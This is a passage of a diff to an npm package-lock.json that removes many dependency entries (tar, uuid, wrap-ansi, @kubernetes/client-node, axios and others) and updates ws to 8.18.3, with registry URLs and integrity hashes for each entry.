"https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "dependencies": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "engines": { - "node": ">=18" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs": { - "name": "wrap-ansi", - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs/node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/wrap-ansi-cjs/node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/wrap-ansi-cjs/node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/wrap-ansi-cjs/node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/wrap-ansi-cjs/node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "license": "ISC" }, "node_modules/ws": { - "version": "8.18.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.0.tgz", - "integrity": "sha512-8VbfWfHLbbwu3+N6OKsOMpBdT4kXPDDB9cJk2bJ6mh9ucxdlnNvH1e+roYkKmN9Nxw2yjz7VzeO9oOz2zJ04Pw==", + "version": "8.18.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", + "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", + "license": "MIT", "engines": { "node": ">=10.0.0" }, @@ -1147,846 +760,6 @@ "optional": true } } - }, - "node_modules/yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==", - "engines": { - "node": ">=18" - } - } - }, - "dependencies": { - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, - "@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "requires": {} - }, - "@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "requires": {} - }, - "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "requires": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "openid-client": "^6.1.3", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - } - }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" - }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "axios": { - "version": "1.7.9", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz", - "integrity": "sha512-LhLcE7Hbiryz8oMDdDptSrWowmB4Bl6RCt6sIJKpRB4XtVf0iEgewX3au/pJqm+Py1kCASkb/FFKjxQaLtxJvw==", - "requires": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - }, - "dependencies": { - "form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - } - } - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "requires": { - "balanced-match": "^1.0.0" - } - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=" - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" - }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, - "foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "requires": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - } - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, - "jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, - "jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, - "mime-db": { - "version": "1.49.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.49.0.tgz", - "integrity": "sha512-CIc8j9URtOVApSFCQIF+VBkX1RwXp/oMMOrqdyXSBXq5RWNEsRfyj1kiRnQgmNXmHxPoFIxOroKA3zcU9P+nAA==" - }, - "mime-types": { - "version": "2.1.32", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.32.tgz", - "integrity": "sha512-hJGaVS4G4c9TSMYh2n6SQAGrC4RnfU+daP8G7cSCmaqNjiOoUY0VHCMS42pxnQmVF1GWwFhbHWn3RIxCqTmZ9A==", - "requires": { - "mime-db": "1.49.0" - } - }, - "minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "requires": { - "brace-expansion": "^2.0.1" - } - }, - "minipass": { - 